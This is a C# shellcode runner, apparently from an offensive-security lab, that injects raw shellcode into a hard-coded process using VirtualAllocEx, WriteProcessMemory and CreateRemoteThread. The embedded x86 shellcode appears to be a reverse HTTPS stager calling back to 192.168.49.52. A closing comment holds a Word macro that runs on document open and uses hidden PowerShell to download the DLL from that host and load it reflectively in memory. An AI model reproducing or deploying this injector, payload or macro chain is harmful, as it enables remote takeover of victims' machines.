using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;

namespace ClassLibrary1
{
    public class Class1
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int
       processId);
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        [DllImport("kernel32.dll")]
        static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
        [DllImport("kernel32.dll")]
        static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr
       lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
        public static void runner()
        {
            //Note to self: Make sure Visual Studio is set to ANY CPU. Secondly, make sure you're reflectively loading the right fucking DLL, which is NOT the x64 one.
            //Change third parameter to desired PID of process to inject into
            IntPtr hProcess = OpenProcess(0x001F0FFF, false, 1500);
            IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
            //x64 payload            byte[] buf = new byte[643] { 0xeb, 0x27, 0x5b, 0x53, 0x5f, 0xb0, 0xc3, 0xfc, 0xae, 0x75, 0xfd, 0x57, 0x59, 0x53, 0x5e, 0x8a, 0x06, 0x30, 0x07, 0x48, 0xff, 0xc7, 0x48, 0xff, 0xc6, 0x66, 0x81, 0x3f, 0xb1, 0x8d, 0x74, 0x07, 0x80, 0x3e, 0xc3, 0x75, 0xea, 0xeb, 0xe6, 0xff, 0xe1, 0xe8, 0xd4, 0xff, 0xff, 0xff, 0x14, 0xc3, 0xe8, 0x5c, 0x97, 0xf0, 0xe4, 0xfc, 0xd8, 0x14, 0x14, 0x14, 0x55, 0x45, 0x55, 0x44, 0x46, 0x5c, 0x25, 0xc6, 0x45, 0x71, 0x5c, 0x9f, 0x46, 0x74, 0x42, 0x5c, 0x9f, 0x46, 0x0c, 0x5c, 0x9f, 0x46, 0x34, 0x5c, 0x1b, 0xa3, 0x5e, 0x5e, 0x59, 0x25, 0xdd, 0x5c, 0x9f, 0x66, 0x44, 0x5c, 0x25, 0xd4, 0xb8, 0x28, 0x75, 0x68, 0x16, 0x38, 0x34, 0x55, 0xd5, 0xdd, 0x19, 0x55, 0x15, 0xd5, 0xf6, 0xf9, 0x46, 0x55, 0x45, 0x5c, 0x9f, 0x46, 0x34, 0x9f, 0x56, 0x28, 0x5c, 0x15, 0xc4, 0x72, 0x95, 0x6c, 0x0c, 0x1f, 0x16, 0x1b, 0x91, 0x66, 0x14, 0x14, 0x14, 0x9f, 0x94, 0x9c, 0x14, 0x14, 0x14, 0x5c, 0x91, 0xd4, 0x60, 0x73, 0x5c, 0x15, 0xc4, 0x9f, 0x5c, 0x0c, 0x50, 0x9f, 0x54, 0x34, 0x44, 0x5d, 0x15, 0xc4, 0xf7, 0x42, 0x5c, 0xeb, 0xdd, 0x59, 0x25, 0xdd, 0x55, 0x9f, 0x20, 0x9c, 0x5c, 0x15, 0xc2, 0x5c, 0x25, 0xd4, 0x55, 0xd5, 0xdd, 0x19, 0xb8, 0x55, 0x15, 0xd5, 0x2c, 0xf4, 0x61, 0xe5, 0x58, 0x17, 0x58, 0x30, 0x1c, 0x51, 0x2d, 0xc5, 0x61, 0xcc, 0x4c, 0x50, 0x9f, 0x54, 0x30, 0x5d, 0x15, 0xc4, 0x72, 0x55, 0x9f, 0x18, 0x5c, 0x50, 0x9f, 0x54, 0x08, 0x5d, 0x15, 0xc4, 0x55, 0x9f, 0x10, 0x9c, 0x55, 0x4c, 0x5c, 0x15, 0xc4, 0x55, 0x4c, 0x4a, 0x4d, 0x4e, 0x55, 0x4c, 0x55, 0x4d, 0x55, 0x4e, 0x5c, 0x97, 0xf8, 0x34, 0x55, 0x46, 0xeb, 0xf4, 0x4c, 0x55, 0x4d, 0x4e, 0x5c, 0x9f, 0x06, 0xfd, 0x5f, 0xeb, 0xeb, 0xeb, 0x49, 0x5c, 0x25, 0xcf, 0x47, 0x5d, 0xaa, 0x63, 0x7d, 0x7a, 0x7d, 0x7a, 0x71, 0x60, 0x14, 0x55, 0x42, 0x5c, 0x9d, 0xf5, 0x5d, 0xd3, 0xd6, 0x58, 0x63, 0x32, 0x13, 0xeb, 0xc1, 0x47, 0x47, 0x5c, 0x9d, 0xf5, 0x47, 0x4e, 0x59, 0x25, 0xd4, 0x59, 0x25, 0xdd, 0x47, 0x47, 0x5d, 0xae, 0x2e, 0x42, 0x6d, 0xb3, 0x14, 0x14, 0x14, 0x14, 0xeb, 0xc1, 0xfc, 0x1a, 0x14, 0x14, 0x14, 0x25, 0x2d, 0x26, 0x3a, 0x25, 0x22, 0x2c, 0x3a, 0x20, 0x2d, 0x3a, 0x21, 0x26, 0x14, 0x4e, 0x5c, 0x9d, 0xd5, 0x5d, 0xd3, 0xd4, 0xaf, 0x15, 0x14, 0x14, 0x59, 0x25, 0xdd, 0x47, 0x47, 0x7e, 0x17, 0x47, 0x5d, 0xae, 0x43, 0x9d, 0x8b, 0xd2, 0x14, 0x14, 0x14, 0x14, 0xeb, 0xc1, 0xfc, 0x33, 0x14, 0x14, 0x14, 0x3b, 0x70, 0x75, 0x56, 0x23, 0x63, 0x59, 0x55, 0x5e, 0x52, 0x44, 0x43, 0x51, 0x25, 0x4d, 0x4c, 0x4c, 0x21, 0x57, 0x71, 0x46, 0x7c, 0x45, 0x7d, 0x5a, 0x42, 0x5a, 0x70, 0x7c, 0x53, 0x50, 0x60, 0x63, 0x75, 0x66, 0x66, 0x59, 0x58, 0x14, 0x5c, 0x9d, 0xd5, 0x47, 0x4e, 0x55, 0x4c, 0x59, 0x25, 0xdd, 0x47, 0x5c, 0xac, 0x14, 0x26, 0xbc, 0x90, 0x14, 0x14, 0x14, 0x14, 0x44, 0x47, 0x47, 0x5d, 0xd3, 0xd6, 0xff, 0x41, 0x3a, 0x2f, 0xeb, 0xc1, 0x5c, 0x9d, 0xd2, 0x7e, 0x1e, 0x4b, 0x5c, 0x9d, 0xe5, 0x7e, 0x0b, 0x4e, 0x46, 0x7c, 0x94, 0x27, 0x14, 0x14, 0x5d, 0x9d, 0xf4, 0x7e, 0x10, 0x55, 0x4d, 0x5d, 0xae, 0x61, 0x52, 0x8a, 0x92, 0x14, 0x14, 0x14, 0x14, 0xeb, 0xc1, 0x59, 0x25, 0xd4, 0x47, 0x4e, 0x5c, 0x9d, 0xe5, 0x59, 0x25, 0xdd, 0x59, 0x25, 0xdd, 0x47, 0x47, 0x5d, 0xd3, 0xd6, 0x39, 0x12, 0x0c, 0x6f, 0xeb, 0xc1, 0x91, 0xd4, 0x61, 0x0b, 0x5c, 0xd3, 0xd5, 0x9c, 0x07, 0x14, 0x14, 0x5d, 0xae, 0x50, 0xe4, 0x21, 0xf4, 0x14, 0x14, 0x14, 0x14, 0xeb, 0xc1, 0x5c, 0xeb, 0xdb, 0x60, 0x16, 0xff, 0xbe, 0xfc, 0x41, 0x14, 0x14, 0x14, 0x47, 0x4d, 0x7e, 0x54, 0x4e, 0x5d, 0x9d, 0xc5, 0xd5, 0xf6, 0x04, 0x5d, 0xd3, 0xd4, 0x14, 0x04, 0x14, 0x14, 0x5d, 0xae, 0x4c, 0xb0, 0x47, 0xf1, 0x14, 0x14, 0x14, 0x14, 0xeb, 0xc1, 0x5c, 0x87, 0x47, 0x47, 0x5c, 0x9d, 0xf3, 0x5c, 0x9d, 0xe5, 0x5c, 0x9d, 0xce, 0x5d, 0xd3, 0xd4, 0x14, 0x34, 0x14, 0x14, 0x5d, 0x9d, 0xed, 0x5d, 0xae, 0x06, 0x82, 0x9d, 0xf6, 0x14, 0x14, 0x14, 0x14, 0xeb, 0xc1, 0x5c, 0x97, 0xd0, 0x34, 0x91, 0xd4, 0x60, 0xa6, 0x72, 0x9f, 0x13, 0x5c, 0x15, 0xd7, 0x91, 0xd4, 0x61, 0xc6, 0x4c, 0xd7, 0x4c, 0x7e, 0x14, 0x4d, 0xaf, 0xf4, 0x09, 0x3e, 0x1e, 0x55, 0x9d, 0xce, 0xeb, 0xc1, 0xb1, 0x8d };
            //x86 payload
            byte[] buf = new byte[568] { 0xfc, 0xe8, 0x8f, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x31, 0xff, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x49, 0x75, 0xef, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4c, 0x01, 0xd0, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0x8b, 0x48, 0x18, 0x50, 0x85, 0xc9, 0x74, 0x3c, 0x31, 0xff, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xc0, 0xc1, 0xcf, 0x0d, 0xac, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe0, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xe9, 0x80, 0xff, 0xff, 0xff, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xdb, 0x53, 0x53, 0x53, 0x53, 0x53, 0xe8, 0x3e, 0x00, 0x00, 0x00, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x31, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x37, 0x2e, 0x30, 0x3b, 0x20, 0x72, 0x76, 0x3a, 0x31, 0x31, 0x2e, 0x30, 0x29, 0x20, 0x6c, 0x69, 0x6b, 0x65, 0x20, 0x47, 0x65, 0x63, 0x6b, 0x6f, 0x00, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0x53, 0x53, 0x6a, 0x03, 0x53, 0x53, 0x68, 0xbb, 0x01, 0x00, 0x00, 0xe8, 0xfc, 0x00, 0x00, 0x00, 0x2f, 0x36, 0x43, 0x61, 0x38, 0x78, 0x4f, 0x66, 0x47, 0x56, 0x6a, 0x69, 0x34, 0x70, 0x62, 0x6d, 0x6b, 0x32, 0x46, 0x65, 0x6c, 0x59, 0x41, 0x58, 0x63, 0x66, 0x72, 0x77, 0x4a, 0x70, 0x79, 0x2d, 0x35, 0x33, 0x38, 0x63, 0x45, 0x4f, 0x79, 0x69, 0x4d, 0x55, 0x36, 0x64, 0x41, 0x68, 0x66, 0x75, 0x4b, 0x41, 0x59, 0x62, 0x35, 0x43, 0x39, 0x53, 0x5a, 0x66, 0x79, 0x6e, 0x68, 0x36, 0x31, 0x61, 0x76, 0x62, 0x77, 0x33, 0x31, 0x4d, 0x56, 0x76, 0x78, 0x74, 0x75, 0x75, 0x44, 0x58, 0x77, 0x30, 0x70, 0x51, 0x72, 0x62, 0x45, 0x4c, 0x72, 0x4d, 0x4c, 0x30, 0x66, 0x59, 0x35, 0x6d, 0x44, 0x62, 0x52, 0x55, 0x6a, 0x6b, 0x42, 0x76, 0x70, 0x38, 0x39, 0x36, 0x4c, 0x43, 0x00, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0x89, 0xc6, 0x53, 0x68, 0x00, 0x32, 0xe8, 0x84, 0x53, 0x53, 0x53, 0x57, 0x53, 0x56, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x96, 0x6a, 0x0a, 0x5f, 0x68, 0x80, 0x33, 0x00, 0x00, 0x89, 0xe0, 0x6a, 0x04, 0x50, 0x6a, 0x1f, 0x56, 0x68, 0x75, 0x46, 0x9e, 0x86, 0xff, 0xd5, 0x53, 0x53, 0x53, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x75, 0x14, 0x68, 0x88, 0x13, 0x00, 0x00, 0x68, 0x44, 0xf0, 0x35, 0xe0, 0xff, 0xd5, 0x4f, 0x75, 0xcd, 0xe8, 0x4a, 0x00, 0x00, 0x00, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x53, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0x53, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xcf, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0x5f, 0xe8, 0x6b, 0xff, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x34, 0x39, 0x2e, 0x35, 0x32, 0x00, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x53, 0xff, 0xd5 };
            IntPtr outSize;
            WriteProcessMemory(hProcess, addr, buf, buf.Length, out outSize);
            IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr,
           IntPtr.Zero, 0, IntPtr.Zero);
        }
    }
}


/*
 * Sub Document_open()
runner

End Sub

Sub AutoOpen()
runner

End Sub

Sub runner()

Dim str As String
str = "powershell.exe -c $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.52:8000/ShellCodeRunners/ProcessInject/ClassLibrary1/bin/Release/ClassLibrary1.dll'); $assem = [System.Reflection.Assembly]::Load($data); $class = $assem.GetType('ClassLibrary1.Class1'); $method = $class.GetMethod('runner'); $method.Invoke(0, $null)"
Shell str, vbHide

End Sub
*/
